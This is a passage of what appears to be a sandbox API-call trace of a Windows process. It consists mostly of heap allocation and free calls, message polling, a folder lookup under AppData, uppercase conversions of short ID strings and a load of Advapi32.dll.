hHeap=0x25c0000) returned 1 [0247.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0247.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0247.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0247.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0247.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0247.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0247.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0247.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0247.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0247.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0247.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0247.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0247.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0247.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0247.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0247.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0247.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0247.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0247.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0247.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0247.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0247.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0247.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0247.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0247.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0247.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0247.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0247.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0247.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0247.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0247.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0247.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0248.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0248.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.000] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0248.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0248.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0248.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0248.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0248.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0248.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0248.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0248.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0248.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0248.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0248.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0248.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0248.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0248.001] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0248.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0248.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0248.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0248.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0248.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0248.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0248.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.002] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Microsoft Help", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9e0530, dwReserved1=0x9d0c, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 0xaa5920 [0248.002] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0248.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0248.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0248.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0248.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0248.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.003] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0248.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0248.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0248.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0248.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0248.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0248.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0248.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0248.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0248.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0248.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0248.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0248.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0248.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.006] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0248.006] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0248.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0248.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0248.006] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0248.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0248.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0248.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.007] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0248.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0248.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0248.007] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0248.007] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.007] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0248.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0248.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0248.008] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0248.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0248.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0248.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0248.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.008] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0248.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0248.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0248.009] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0248.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0248.009] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0248.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0248.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0248.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0248.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.012] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.013] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0248.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.013] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.013] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.013] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0248.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.014] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0248.014] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0248.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0248.014] HeapFree (in: 